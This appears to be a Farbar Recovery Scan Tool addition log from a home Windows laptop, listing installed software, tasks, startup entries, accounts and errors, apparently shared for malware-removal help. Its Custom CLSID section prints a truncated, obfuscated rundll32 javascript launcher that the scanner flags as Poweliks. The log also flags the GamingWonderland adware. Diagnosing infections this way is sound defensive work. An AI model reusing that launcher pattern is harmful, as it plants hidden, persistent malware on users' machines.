CCC Help Greek (x32 Version: 2012.0808.1023.16666 - Advanced Micro Devices, Inc.) Hidden
CCC Help Hungarian (x32 Version: 2012.0808.1023.16666 - Advanced Micro Devices, Inc.) Hidden
CCC Help Italian (x32 Version: 2012.0808.1023.16666 - Advanced Micro Devices, Inc.) Hidden
CCC Help Japanese (x32 Version: 2012.0808.1023.16666 - Advanced Micro Devices, Inc.) Hidden
CCC Help Korean (x32 Version: 2012.0808.1023.16666 - Advanced Micro Devices, Inc.) Hidden
CCC Help Norwegian (x32 Version: 2012.0808.1023.16666 - Advanced Micro Devices, Inc.) Hidden
CCC Help Polish (x32 Version: 2012.0808.1023.16666 - Advanced Micro Devices, Inc.) Hidden
CCC Help Portuguese (x32 Version: 2012.0808.1023.16666 - Advanced Micro Devices, Inc.) Hidden
CCC Help Russian (x32 Version: 2012.0808.1023.16666 - Advanced Micro Devices, Inc.) Hidden
CCC Help Spanish (x32 Version: 2012.0808.1023.16666 - Advanced Micro Devices, Inc.) Hidden
CCC Help Swedish (x32 Version: 2012.0808.1023.16666 - Advanced Micro Devices, Inc.) Hidden
CCC Help Thai (x32 Version: 2012.0808.1023.16666 - Advanced Micro Devices, Inc.) Hidden
CCC Help Turkish (x32 Version: 2012.0808.1023.16666 - Advanced Micro Devices, Inc.) Hidden
ccc-utility64 (Version: 2012.0808.1024.16666 - Advanced Micro Devices, Inc.) Hidden
CutePDF Writer 3.0 (HKLM\...\CutePDF Writer Installation) (Version:  3.0 - Acro Software Inc.)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Definition Update for Microsoft Office 2010 (KB982726) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{60098CE4-EB16-42D1-9FF6-923488C2AB26}) (Version:  - Microsoft)
Emsisoft Anti-Malware (HKLM-x32\...\{5502032C-88C1-4303-99FE-B5CBD7684CEA}_is1) (Version: 9.0 - Emsisoft GmbH)
File Association Helper (HKLM\...\{C168639F-5810-4EC8-B1E8-0251AA8A771C}) (Version: 1.2.225.65451 - WinZip Computing International, LLC)
Five Nights at Freddy's (HKLM-x32\...\Steam App 319510) (Version:  - Scott Cawthon)
FormsWorkFlow 2007 (HKLM-x32\...\{4D3D1B2B-9ECE-4B3C-8579-D4BF918BB8C4}) (Version: 4.2.12 - American LegalNet, Inc.)
GamingWonderland Internet Explorer Toolbar (HKLM-x32\...\GamingWonderlandbar Uninstall Internet Explorer) (Version:  - Mindspark Interactive Network) <==== ATTENTION
HP Officejet 6600 Basic Device Software (HKLM\...\{B407F586-D027-45C3-9109-CC2943E839FA}) (Version: 28.0.1315.0 - Hewlett-Packard Co.)
HP Officejet 6600 Help (HKLM-x32\...\{2FA81482-5570-4CF0-9A10-D61D2F164916}) (Version: 140.0.2.2 - Hewlett Packard)
HP Support Solutions Framework (HKLM-x32\...\{44157EB3-D8D0-4BB1-B0F5-AD2C38814ED1}) (Version: 11.51.0027 - Hewlett-Packard Company)
I.R.I.S. OCR (HKLM-x32\...\{CA6BCA2F-EDEB-408F-850B-31404BE16A61}) (Version: 12.3.4.0 - HP)
iTunes (HKLM\...\{1CF5754A-545B-4360-BFDE-2847BC728DFC}) (Version: 11.2.0.115 - Apple Inc.)
Java 7 Update 67 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F06417067FF}) (Version: 7.0.670 - Oracle)
Junk Mail filter update (x32 Version: 16.4.3505.0912 - Microsoft Corporation) Hidden
Malwarebytes Anti-Malware version 2.0.2.1012 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.2.1012 - Malwarebytes Corporation)
Microsoft Application Error Reporting (Version: 12.0.6015.5000 - Microsoft Corporation) Hidden
Microsoft Office (HKLM-x32\...\{95140000-0070-0000-0000-0000000FF1CE}) (Version: 14.0.6120.5004 - Microsoft Corporation)
Microsoft Office 2010 Service Pack 1 (SP1) (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{047B0968-E622-4FAA-9B4B-121FA109EDDE}) (Version:  - Microsoft)
Microsoft Office 2010 Service Pack 1 (SP1) (x32 Version:  - Microsoft) Hidden
Microsoft Office Access MUI (English) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office Access Setup Metadata MUI (English) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office Excel MUI (English) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office Home and Student 2010 (HKLM-x32\...\Office14.SingleImage) (Version: 14.0.6029.1000 - Microsoft Corporation)
Microsoft Office Office 64-bit Components 2010 (Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office OneNote MUI (English) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office Outlook MUI (English) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office PowerPoint MUI (English) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (English) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (French) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (Spanish) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office Proofing (English) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office Publisher MUI (English) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared 64-bit MUI (English) 2010 (Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared 64-bit Setup Metadata MUI (English) 2010 (Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared MUI (English) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared Setup Metadata MUI (English) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office Single Image 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office Word MUI (English) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.20125.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005 (HKLM-x32\...\{7f51bdb9-ee21-49ee-94d6-90afc321780e}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005 (HKLM-x32\...\{ce085a78-074e-4823-8dc1-8a721b94b76d}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 x64 Additional Runtime - 12.0.21005 (Version: 12.0.21005 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2013 x64 Minimum Runtime - 12.0.21005 (Version: 12.0.21005 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (x32 Version: 12.0.21005 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (x32 Version: 12.0.21005 - Microsoft Corporation) Hidden
Movie Maker (x32 Version: 16.4.3505.0912 - Microsoft Corporation) Hidden
MSVCRT (x32 Version: 15.4.2862.0708 - Microsoft) Hidden
MSVCRT_amd64 (x32 Version: 15.4.2862.0708 - Microsoft) Hidden
MSVCRT110 (x32 Version: 16.4.1108.0727 - Microsoft) Hidden
MSVCRT110_amd64 (Version: 16.4.1109.0912 - Microsoft) Hidden
Nikon Message Center 2 (HKLM-x32\...\{B014EE44-9197-4513-9613-71E6EB1B514E}) (Version: 2.1.1 - Nikon)
Nikon Movie Editor (HKLM-x32\...\{5CAD3393-EEC0-44CE-9F93-BCAA365B77FB}) (Version: 2.9.2 - Nikon)
Origin (HKLM-x32\...\Origin) (Version: 9.4.7.2799 - Electronic Arts, Inc.)
Pdf995 (HKLM-x32\...\Pdf995) (Version:  - )
Photo Gallery (x32 Version: 16.4.3505.0912 - Microsoft Corporation) Hidden
Plants vs. Zombies - Game of the Year (x32 Version: 2.2.0.98 - WildTangent) Hidden
PlayReady PC Runtime amd64 (HKLM\...\{BCA9334F-B6C9-4F65-9A73-AC5A329A4D04}) (Version: 1.3.0 - Microsoft Corporation)
Premium Sound HD (HKLM\...\{94F03B8E-CB73-4653-AFE9-79112C01FED2}) (Version: 1.12.4600 - SRS Labs, Inc.)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 8.3.730.2012 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6687 - Realtek Semiconductor Corp.)
Realtek USB 2.0 Card Reader (HKLM-x32\...\{96AE7E41-E34E-47D0-AC07-1091A8127911}) (Version: 6.1.8400.30136 - Realtek Semiconductor Corp.)
Realtek WLAN Driver (HKLM-x32\...\{9D3D8C60-A55F-4fed-B2B9-173001290E16}) (Version: 2.00.0020 - REALTEK Semiconductor Corp.)
SPORE™ (HKLM-x32\...\{9DF0196F-B6B8-4C3A-8790-DE42AA530101}) (Version: 1.00.0000 - Electronic Arts)
Steam (HKLM-x32\...\Steam) (Version:  - Valve Corporation)
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 16.2.10.3 - Synaptics Incorporated)
The Sims™ 3 (HKLM-x32\...\{C05D8CDB-417D-4335-A38C-A0659EDFD6B8}) (Version: 1.67.2 - Electronic Arts)
The Sims™ 3 Generations (HKLM-x32\...\{E6B88BD6-E4B2-4701-A648-B6DAC6E491CC}) (Version: 8.0.152 - Electronic Arts)
The Sims™ 3 Late Night (HKLM-x32\...\{45057FCE-5784-48BE-8176-D9D00AF56C3C}) (Version: 6.5.1 - Electronic Arts)
The Sims™ 3 Pets (HKLM-x32\...\{C12631C6-804D-4B32-B0DD-8A496462F106}) (Version: 10.0.96 - Electronic Arts)
The Sims™ 3 Supernatural (HKLM-x32\...\{B37DAFA5-717D-41F8-BDFB-3A4B68C0B3A1}) (Version: 15.0.135 - Electronic Arts)
The Sims™ 4 (HKLM-x32\...\{48EBEBBF-B9F8-4520-A3CF-89A730721917}) (Version: 1.0.732.20 - Electronic Arts Inc.)
Toshiba App Place (HKLM-x32\...\{ED3CBA78-488F-4E8C-B33F-8E3BF4DDB4D2}) (Version: 1.0.6.3 - Toshiba)
TOSHIBA Application Installer (HKLM-x32\...\{970472D0-F5F9-4158-A6E3-1AE49EFEF2D3}) (Version: 9.0.1.4 - TOSHIBA)
TOSHIBA Desktop Assist (HKLM\...\{95CCACF0-010D-45F0-82BF-858643D8BC02}) (Version: 1.00.0007.00002 - Toshiba Corporation)
TOSHIBA eco Utility (HKLM\...\{5944B9D4-3C2A-48DE-931E-26B31714A2F7}) (Version: 2.0.0.6414 - Toshiba Corporation)
TOSHIBA Function Key (HKLM\...\{16562A90-71BC-41A0-B890-D91B0C267120}) (Version: 1.00.6425 - Toshiba Corporation)
Toshiba Password Utility (HKLM-x32\...\InstallShield_{6D35FF17-A8B3-43D3-917E-5A1F2C3FB628}) (Version: 2.00.800 - Toshiba Corporation)
Toshiba Password Utility (x32 Version: 2.00.800 - Toshiba Corporation) Hidden
TOSHIBA PC Health Monitor (HKLM\...\{9DECD0F9-D3E8-48B0-A390-1CF09F54E3A4}) (Version: 1.8.17.640104 - Toshiba Corporation)
TOSHIBA Quality Application (HKLM-x32\...\{E69992ED-A7F6-406C-9280-1C156417BC49}) (Version: 1.0.8 - TOSHIBA)
TOSHIBA Recovery Media Creator (HKLM-x32\...\{B65BBB06-1F8E-48F5-8A54-B024A9E15FDF}) (Version: 2.2.0.54043005 - Toshiba Corporation)
TOSHIBA Resolution+ Plug-in for Windows Media Player (HKLM-x32\...\{6CB76C9D-80C2-4CB3-A4CD-D96B239E3F94}) (Version: 1.2.1.00 - TOSHIBA Corporation)
TOSHIBA Service Station (HKLM\...\{FBFCEEA5-96EA-4C8E-9262-43CBBEBAE413}) (Version: 2.6.8 - Toshiba Corporation)
TOSHIBA System Driver (HKLM-x32\...\{1E6A96A1-2BAB-43EF-8087-30437593C66C}) (Version: 1.00.0012 - Toshiba Corporation)
TOSHIBA System Settings (HKLM-x32\...\{05A55927-DB9B-4E26-BA44-828EBFF829F0}) (Version: 1.00.0001.32002 - Toshiba Corporation)
TOSHIBA User's Guide (HKLM-x32\...\{3384E1D9-3F18-4A98-8655-180FEF0DFC02}) (Version: 1.00.02 - TOSHIBA)
TOSHIBA VIDEO PLAYER (HKLM\...\{FF07604E-C860-40E9-A230-E37FA41F103A}) (Version: 5.1.0.12-A - Toshiba Corporation)
TOSHIBARegistration (HKLM-x32\...\{5AF550B4-BB67-4E7E-82F1-2C4300279050}) (Version: 1.1.6 - TOSHIBA)
Unity Web Player (HKCU\...\UnityWebPlayer) (Version:  - Unity Technologies ApS)
Update for Microsoft Office 2010 (KB2553065) (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{A8686D24-1E89-43A1-973E-05A258D2B3F8}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2553181) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{48E1B6C2-7299-4F3F-AA63-42F0ACE55AA4}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2553267) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{18B3CF2A-73F7-4716-B1AE-86D68726D408}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2553310) 32-Bit Edition (HKLM-x32\...\{90140000-006E-0409-0000-0000000FF1CE}_Office14.SingleImage_{73E67A3A-8D61-44EF-90C2-1697C3DBE668}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2566458) (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{EFB525A0-E1C0-4E32-9968-FE401BC87363}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2596964) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{ED31DE9A-3E13-4E2C-9106-E0D8AFFB9FA6}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2598242) 32-Bit Edition (HKLM-x32\...\{90140000-001F-0409-0000-0000000FF1CE}_Office14.SingleImage_{C4F26A9B-B121-4135-8084-A0D9C780C7C8}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2598242) 32-Bit Edition (HKLM-x32\...\{90140000-001F-040C-0000-0000000FF1CE}_Office14.SingleImage_{460FF681-BC66-4C38-99DF-7012E03F1EBA}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2598242) 32-Bit Edition (HKLM-x32\...\{90140000-001F-0C0A-0000-0000000FF1CE}_Office14.SingleImage_{C633216E-FF30-45B6-B2AB-21922A9353EF}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2687509) 32-Bit Edition (HKLM-x32\...\{90140000-002A-0000-1000-0000000FF1CE}_Office14.SingleImage_{1CBEDB37-C438-473F-8BA0-2535B0D237E2}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2687509) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{1CBEDB37-C438-473F-8BA0-2535B0D237E2}) (Version:  - Microsoft)
Update for Microsoft OneNote 2010 (KB2553290) 32-Bit Edition (HKLM-x32\...\{90140000-00A1-0409-0000-0000000FF1CE}_Office14.SingleImage_{9865DC3A-2898-48D9-B96A-46397571C934}) (Version:  - Microsoft)
Update for Microsoft OneNote 2010 (KB2687277) 32-Bit Edition (HKLM-x32\...\{90140000-002A-0000-1000-0000000FF1CE}_Office14.SingleImage_{DFE7321B-F914-4AB5-8C74-1F8CC932B1B0}) (Version:  - Microsoft)
Update for Microsoft OneNote 2010 (KB2687277) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{DFE7321B-F914-4AB5-8C74-1F8CC932B1B0}) (Version:  - Microsoft)
Update for Microsoft Outlook 2010 (KB2687623) 32-Bit Edition (HKLM-x32\...\{90140000-001A-0409-0000-0000000FF1CE}_Office14.SingleImage_{47894754-0FEC-4920-9A65-6C1E732587AC}) (Version:  - Microsoft)
Update for Microsoft Outlook 2010 (KB2687623) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{326F9E80-FE16-4D2A-827A-4EE1A87B1CE8}) (Version:  - Microsoft)
Update for Microsoft Outlook Social Connector 2010 (KB2553406) 32-Bit Edition (HKLM-x32\...\{90140000-001A-0409-0000-0000000FF1CE}_Office14.SingleImage_{1EEFF749-6F29-4F0B-AB08-4C6EA52AA110}) (Version:  - Microsoft)
Update for Microsoft Outlook Social Connector 2010 (KB2553406) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{BC6DFBFD-16DD-47E1-A7EF-2C062930FA4F}) (Version:  - Microsoft)
Update for Microsoft SharePoint Workspace 2010 (KB2589371) 32-Bit Edition (HKLM-x32\...\{90140000-002A-0000-1000-0000000FF1CE}_Office14.SingleImage_{5DA2D071-A54C-47C0-83E5-43C63DBFD936}) (Version:  - Microsoft)
ViewNX 2 (HKLM-x32\...\{E64C137C-D0B7-467A-B47F-460AAB30F0A3}) (Version: 2.10.0 - Nikon)
Visual Studio 2010 x64 Redistributables (HKLM\...\{21B133D6-5979-47F0-BE1C-F6A6B304693F}) (Version: 13.0.0.1 - AVG Technologies)
Visual Studio 2012 x64 Redistributables (HKLM\...\{8C775E70-A791-4DA8-BCC3-6AB7136F4484}) (Version: 14.0.0.1 - AVG Technologies)
Visual Studio 2012 x86 Redistributables (HKLM-x32\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.)
WildTangent Games (HKLM-x32\...\WildTangent toshiba Master Uninstall) (Version: 1.0.3.0 - WildTangent)
Windows Live Communications Platform (x32 Version: 16.4.3505.0912 - Microsoft Corporation) Hidden
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3505.0912 - Microsoft Corporation)
Windows Live Essentials (x32 Version: 16.4.3505.0912 - Microsoft Corporation) Hidden
Windows Live Installer (x32 Version: 16.4.3505.0912 - Microsoft Corporation) Hidden
Windows Live Mail (x32 Version: 16.4.3505.0912 - Microsoft Corporation) Hidden
Windows Live MIME IFilter (Version: 16.4.3505.0912 - Microsoft Corporation) Hidden
Windows Live Photo Common (x32 Version: 16.4.3505.0912 - Microsoft Corporation) Hidden
Windows Live PIMT Platform (x32 Version: 16.4.3505.0912 - Microsoft Corporation) Hidden
Windows Live SOXE (x32 Version: 16.4.3505.0912 - Microsoft Corporation) Hidden
Windows Live SOXE Definitions (x32 Version: 16.4.3505.0912 - Microsoft Corporation) Hidden
Windows Live UX Platform (x32 Version: 16.4.3505.0912 - Microsoft Corporation) Hidden
Windows Live UX Platform Language Pack (x32 Version: 16.4.3505.0912 - Microsoft Corporation) Hidden
Windows Live Writer (x32 Version: 16.4.3505.0912 - Microsoft Corporation) Hidden
Windows Live Writer Resources (x32 Version: 16.4.3505.0912 - Microsoft Corporation) Hidden
WinRAR 5.01 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.01.0 - win.rar GmbH)
WinZip 17.5 (HKLM\...\{CD95F661-A5C4-44F5-A6AA-ECDD91C240DD}) (Version: 17.5.10562 - WinZip Computing, S.L. )
Wizard101 (HKLM-x32\...\{A9E27FF5-6294-46A8-B8FD-77B1DECA3021}) (Version: 1.0.0 - KingsIsle Entertainment, Inc.)

==================== Custom CLSID (selected items): ==========================

(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)

CustomCLSID: HKU\S-1-5-21-3754358886-4043612072-4009104627-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?

==================== Restore Points  =========================

Could not list Restore Points. Check "winmgmt" service or repair WMI.


==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2012-07-25 22:26 - 2012-07-25 22:26 - 00000824 ____A C:\windows\system32\Drivers\etc\hosts

==================== Scheduled Tasks (whitelisted) =============

(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)

Task: {1AAFF332-5C62-4558-9991-DAA649C4C9C5} - System32\Tasks\Microsoft\Windows\Sysmain\WsSwapAssessmentTask => Rundll32.exe sysmain.dll,PfSvWsSwapAssessmentTask
Task: {23A5D8BE-9196-40EB-BD89-794398B2B073} - System32\Tasks\Microsoft\Windows\WS\WSRefreshBannedAppsListTask => Rundll32.exe WSClient.dll,RefreshBannedAppsList
Task: {385A4F92-1400-4CAC-A0E8-955B091FA0A7} - System32\Tasks\Norton Anti-Theft\Norton Error Processor => C:\Program Files (x86)\Norton Anti-Theft\Engine\1.6.0.17\SymErr.exe
Task: {468ECC2C-5F2E-404F-88D8-C595C9D3DBCE} - System32\Tasks\TOSHIBA\Service Station => C:\Program Files\TOSHIBA\Toshiba Service Station\ToshibaServiceStation.exe [2013-07-31] (TOSHIBA Corporation)
Task: {58397DF5-B94B-409A-B346-80222CFC0CA7} - System32\Tasks\Norton Anti-Theft\Norton Error Analyzer => C:\Program Files (x86)\Norton Anti-Theft\Engine\1.6.0.17\SymErr.exe
Task: {599294A0-CDB1-49FE-9AE6-B04A968C2C28} - System32\Tasks\Microsoft\Windows\Setup\Pre-staged GDR Notification => C:\Windows\system32\NotificationUI.exe [2014-01-30] (Microsoft Corporation)
Task: {A72208BF-7A49-4FB8-B684-252375F3443A} - System32\Tasks\Microsoft\Windows\WS\License Validation => Rundll32.exe WSClient.dll,WSpTLR licensing
Task: {AD69A4FC-E4A2-4DEB-A8AB-7287E6920A90} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\windows\system32\MRT.exe [2014-08-29] (Microsoft Corporation)
Task: {C6A88F2D-53D2-4805-9D69-443738A1847C} - System32\Tasks\Microsoft\Windows\ApplicationData\CleanupTemporaryState => Rundll32.exe Windows.Storage.ApplicationData.dll,CleanupTemporaryState
Task: {EA06B0D5-285B-4E3A-85F0-8B88E7091C38} - System32\Tasks\Synaptics TouchPad Enhancements => \Program Files\Synaptics\SynTP\SynTPEnh.exe [2012-08-14] (Synaptics Incorporated)
Task: {EBF06DEC-4228-4813-AC0C-62821AE4E330} - System32\Tasks\Microsoft\Windows\Application Experience\StartupAppTask => Rundll32.exe Startupscan.dll,SusRunTask
Task: {FA08CFE5-C5DF-4E3D-879C-2B3489D55E86} - System32\Tasks\SlimCleaner Plus (Scheduled Scan - Jeremy and Heidi) => C:\Program Files\SlimCleaner Plus\SlimCleanerPlus.exe
Task: C:\windows\Tasks\SlimCleaner Plus (Scheduled Scan - Jeremy and Heidi).job => C:\Program Files\SlimCleaner Plus\SlimCleanerPlus.exe

==================== Loaded Modules (whitelisted) =============

2011-10-13 14:38 - 2011-10-13 14:38 - 00156672 _____ () C:\Program Files (x86)\Toshiba\Password Utility\GFNEXSrv.exe
2014-10-10 08:21 - 2013-10-23 14:24 - 00087600 _____ () C:\windows\System32\cpwmon64.dll
2012-12-23 08:59 - 2012-04-26 14:51 - 00040448 _____ () C:\windows\System32\pdf995mon64.dll
2012-07-18 18:38 - 2012-07-18 18:38 - 00020904 _____ () C:\Program Files\TOSHIBA\Hotkey\SmoothView.dll
2012-07-18 18:38 - 2012-07-18 18:38 - 00049064 _____ () C:\Program Files\TOSHIBA\Hotkey\Hotkey\FnZ.dll
2012-08-13 19:13 - 2012-08-13 19:13 - 00018344 _____ () C:\Program Files\Toshiba\Teco\TecoMUI.dll
2014-09-16 02:46 - 2014-09-16 02:46 - 01179136 _____ () C:\windows\assembly\NativeImages_v4.0.30319_64\Windows.UI\438057c9ea3d42094b63672e9ad4f7e0\Windows.UI.ni.dll
2012-07-25 13:44 - 2012-07-25 13:35 - 00036864 _____ () C:\windows\system32\WinMetadata\Windows.Data.winmd
2014-09-16 02:46 - 2014-09-16 02:46 - 00295936 _____ () C:\windows\assembly\NativeImages_v4.0.30319_64\Windows.Foundation\113ed856861028cde117d9ead96a8717\Windows.Foundation.ni.dll

==================== Alternate Data Streams (whitelisted) =========

(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)


==================== Safe Mode (whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\CleanHlp => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\CleanHlp.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\CleanHlp => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\CleanHlp.sys => ""="Driver"

==================== EXE Association (whitelisted) =============

(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)


==================== MSCONFIG/TASK MANAGER disabled items =========

(Currently there is no automatic fix for this section.)

HKLM\...\StartupApproved\Run: => "SRS Premium Sound HD"
HKLM\...\StartupApproved\Run: => "GamingWonderland Home Page Guard 64 bit"
HKLM\...\StartupApproved\Run32: => "SunJavaUpdateSched"
HKLM\...\StartupApproved\Run32: => "Zwinky_5q Browser Plugin Loader 64"
HKLM\...\StartupApproved\Run32: => "GamingWonderland EPM Support"
HKLM\...\StartupApproved\Run32: => "GamingWonderland Search Scope Monitor"
HKLM\...\StartupApproved\Run32: => "GamingWonderland Browser Plugin Loader 64"
HKLM\...\StartupApproved\Run32: => "GamingWonderland Browser Plugin Loader"
HKCU\...\StartupApproved\StartupFolder: => "OneNote 2010 Screen Clipper and Launcher.lnk"
HKCU\...\StartupApproved\Run: => "SlimCleaner Plus"

========================= Accounts: ==========================

Administrator (S-1-5-21-3754358886-4043612072-4009104627-500 - Administrator - Disabled)
Guest (S-1-5-21-3754358886-4043612072-4009104627-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-3754358886-4043612072-4009104627-1007 - Limited - Enabled)
Jeremy and Heidi (S-1-5-21-3754358886-4043612072-4009104627-1001 - Administrator - Enabled) => C:\Users\Jeremy and Heidi

==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (10/14/2014 03:31:20 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Toshiba_Laptop)
Description: Activation of app microsoft.windowscommunicationsapps_8wekyb3d8bbwe!Microsoft.WindowsLive.Mail failed with error: -2147467263 See the Microsoft-Windows-TWinUI/Operational log for additional information.

Error: (10/14/2014 00:28:16 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: powershell.exe, version: 6.2.9200.16384, time stamp: 0x50109cce
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x02e80e10
Faulting process id: 0x19e4
Faulting application start time: 0xpowershell.exe0
Faulting application path: powershell.exe1
Faulting module path: powershell.exe2
Report Id: powershell.exe3
Faulting package full name: powershell.exe4
Faulting package-relative application ID: powershell.exe5

